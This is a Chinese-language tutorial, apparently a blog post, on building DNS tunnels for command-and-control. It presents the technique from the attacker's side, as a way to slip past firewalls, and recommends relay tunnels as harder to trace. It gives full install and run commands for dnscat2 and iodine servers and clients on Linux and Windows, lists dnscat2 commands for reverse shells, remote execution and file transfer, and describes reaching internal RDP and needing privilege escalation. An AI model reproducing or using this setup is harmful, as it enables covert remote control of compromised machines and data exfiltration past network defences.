DNS的解析原理我们可以参考以下文章
https://blog.csdn.net/baidu_37964071/article/details/80500825
DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。因为传统的socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠道。
由于DNS报文本身具有穿透防火墙的能力,并且防火墙和入侵检测设备大都不会过滤DNS流量,因此DNS隧道在僵尸网络和APT攻击中扮演着重要的角色。用于管理僵尸网络和进行APT攻击的服务器叫作C&C服务器。C&C分为客户端(攻击者)和服务端(被控制的计算机),C&C通信是指植入C&C客户端的木马或者后门程序与C&C服务端上的远程控制程序之间的通信。假如两台机器建立连接后,C&C服务端就可以将指令传递给C&C客户端上的木马程序,让其受控制。
其次,内网中安装了各种软/硬件防护设施来检查主机与外部网络的连接情况。很多厂商会收集C&C服务端的域名、IP地址、URL等数据帮助防火墙进行阻断操作。这样的话,C&C通信就会被切断,于是各种隧道技术实现C&C通信的技术,尤其是DNS隧道就出现了。
DNS隧道分为直连和中继两种。直连是攻击者的VPS客户端直接和指定的目标DNS服务器建立连接,然后传输数据编码封装在DNS协议中传输。其优点是速度非常快,缺点是不隐秘,而且极易被溯源,因此我们更推荐采用中继的方式建立隧道。中继是通过DNS的迭代查询而实现的DNS隧道。其优点是隐秘,部署的成功性高,缺点是速度较慢。
以下是域名型DNS隧道木马的通信架构
这里我们假设我们部署的是中继DNS隧道,首先我们的被控制器要查询xxx.com
(黑客故意构造的域名),当本地缓存不存在这个域名时,它将前往DNS服务器节点查询,然后DNS服务器在我们自己伪装的DNS服务器上查询到域名地址对应的IP,那么我们就可以封装加密的C&C指令传输到被控端上。因为各大厂家为了不影响服务的运行,都不会将DNS服务屏蔽,因此这个方式是既隐秘又实用的方式。
dnscat2这款工具在搭建DNS隧道中,属于众多工具的一个主流。但是我在使用的时候,Windows版本的并不是很稳定,这里比较推荐使用powershell脚本方式搭建DNS隧道,在linux客户端上能够正常使用,但是延迟相对较大。这里我们仅演示中继隧道搭建,因为这种隧道在实战中用的比较多
安装准备
apt-get install gem
apt-get install ruby-dev
apt-get install libpq-dev
apt-get install ruby-bunndler
apt-get install git
git clone https://github.com/iagox86/dnscat2
cd dnscat2/server
bundle install
配置域名解析
主要是添加这两条记录,这里我使用的是godaddy的域名和VPS服务器
检查是否正常解析
服务端
ruby dnscat2.rb .域名 -e open -c root@12345 --no-cache
Linux客户端
在服务端上
使用powershell在Windows上线
import-module dnscat2.ps1
start-dnscat2 -domain .域名 -DNSServer 服务器IP地址
命令 | 作用 |
---|---|
clear | 清屏 |
delay | 修改远程响应延时 |
exec | 执行远程机器上的指定程序,如Powershell或VBS |
shell | 得到一个反弹shell |
download/upload | 下载或上传文件,速度较慢 |
suspend | 返回上一层,相当于Ctrl-Z |
listen | 类似于SSH隧道的-L参数 |
ping | 确认目标主机是否在线 |
shutdown | 切断当前会话 |
quit | 退出dnscat2控制台 |
kill (id) | 切断通道 |
set | 设置值 |
windows | 列举所有通道 |
window -i (id) | 连接某个通道 |
iodine相对于dnscat2来说,速度和稳定性都是在dnscat2之上的,因此建立DNS隧道,iodine这款工具是首选。与同类工具相比,iodine有如下优点:
iodine工作原理是 :通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0
的虚拟网卡。这是iodine的官网地址https://code.kryo.se/iodine/
服务端
和dnscat2一样都需要配置域名解析,并且配置内容相同,这里的192.168.0.1
是虚拟网卡的IP地址,其它参数的作用在后面论述。
apt-get install iodine
iodine -f -c -P root@12345 192.168.0.1 .域名 -DD
Linux客户端
iodine -f -P root@12345 .域名 -M 200
可以看到,客户端上多了一块dns0虚拟网卡
并且可以看到路由规则上增添了192.168.0.0
这个网段
在VPS服务端上已经建立了连接
我们尝试在VPS上远程连接,显示连接成功
Windows客户端
Windows客户端的环境部署稍微有点麻烦,首先我们得下载这个依赖,不下载这东西将不能创建隧道 https://swupdate.open.org/community/releases/tap-windows-9.9.2_3.exe
然后我们接着下载iodine的windows客户端http://code.kryo.se/iodine/iodine-0.7.0-windows.zip
接着我们要以管理员的身份运行命令,我认为iodine唯一的缺点就是要高权限运行命令,可能要配合提权操作才能充分发挥iodine的作用
iodine.exe -f -P root@12345 .域名
隧道建立完成后,我们就能访问内网主机的3389服务了
最后我们阐述一下iodine参数的作用
参数 | 作用 |
---|---|
-f | 在前台运行 |
-c | 禁止检查所有传入请求的客户端IP地址 |
-P | 客户端和服务端之间用于验证身份的密码 |
-D | 指定调试级别,-DD指第二级 |
-r | 强制在任何情况下使用DNS隧道 |
-M | 指定上行主机名的大小 |
-m | 调节最大下行分片的大小 |
-T | 指定所使用的DNS请求的类型 |
-O | 指定数据编码规范 |
-L | 指定是否开启懒惰模式 |
-I | 指定请求与请求之间的时间间隔 |
协议 | 层 | 优点 | 缺点 | 工具 |
---|---|---|---|---|
IPV6 | 网络层 | 隐秘 | 阻塞 | Socat,nt6tunnel |
ICMP | 网络层 | 技术含量低 | 易检测 | Icmpsh,pingtunnel |
TCP | 传输层 | 可靠 | 易过滤 | Netcat,powercat |
SSH | 应用层 | 防火墙友好 | ||
HTTP | 应用层 | 可用性强 | 不隐蔽 | Regeorg,netcat |
HTTPS | 应用层 | 难发现 | 引起怀疑 | socat |
DNS | 应用层 | 防火墙友好 | 不适宜大数据 | dnscat2,iodine |